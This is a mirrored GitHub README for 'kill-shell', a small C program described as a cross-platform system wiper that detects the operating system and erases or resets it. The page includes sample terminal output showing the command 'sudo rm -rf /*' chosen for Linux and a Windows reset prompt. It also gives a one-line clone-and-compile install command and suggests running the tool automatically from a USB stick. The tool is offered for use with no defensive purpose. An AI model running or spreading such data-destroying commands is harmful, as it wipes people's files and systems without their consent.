Code Monkey home page Code Monkey logo

kill-shell's Introduction

kill-shell

simple c program thats spawns a shell wants executed, this shell will detect your os and upon entering will erase or reset the system V1.0

warning

THIS SHELL WILL KILL OR RESET YOUR SYSTEM, FOR LINUX THIS WILL AUTOMATICALLY KILL EVERYTHING ON YOUR DESK AND REMOVE THE ROOT SYSTEM, YOU HVAE BEEN WARNED, DO NOT COMPILE AND EXECUTE IF YOU ARE NOT GOING TO USE IT

features

CROSS PLATFORM FOR WIN64, WIN32, Linux

shell

***********************************************
*         GHOST UTERM FOR OS-REM              *
*           2021-10-16 08:07:25               *
*                                             *
***********************************************
[-] Operating System Detected -> linux

[-] Using -> sudo rm -rf /*

--------------------- Listed/Avalible commands ---------------------
[+] Press Enter : Will continue with the deletion/factory reset process

 >>>>^C

#secondary shell if the OS isnt a range

***********************************************
*         GHOST UTERM FOR OS-REM              *
*           2021-10-16 08:23:37               *
*                                             *
***********************************************
Operating System -> windows

[?] This OS is recognizeed as a windows system

[?] Would you like to reset, crash, or remove it

[?] re - reset |      
Options -> re

[+] Starting command.....

[+] Executing......

#all in one command linux

git clone https://github.com/ArkAngeL43/kill-shell.git ; cd kill-shell ; sudo apt-get install gcc ; gcc main.c -o main ; gcc run.c -o run ; clear ; echo '[+] Done'

windows

download a exe compiler 
compile all c code make sure 
the exe for run  = run 
the exe for main = main

then 

run the exe 


this also will work on a USB in case you want to have a chip automatically run these command files, this was a little project so i figured why not post it

kill-shell's People

Contributors

totallynotahaxxer avatar

Stargazers

 avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.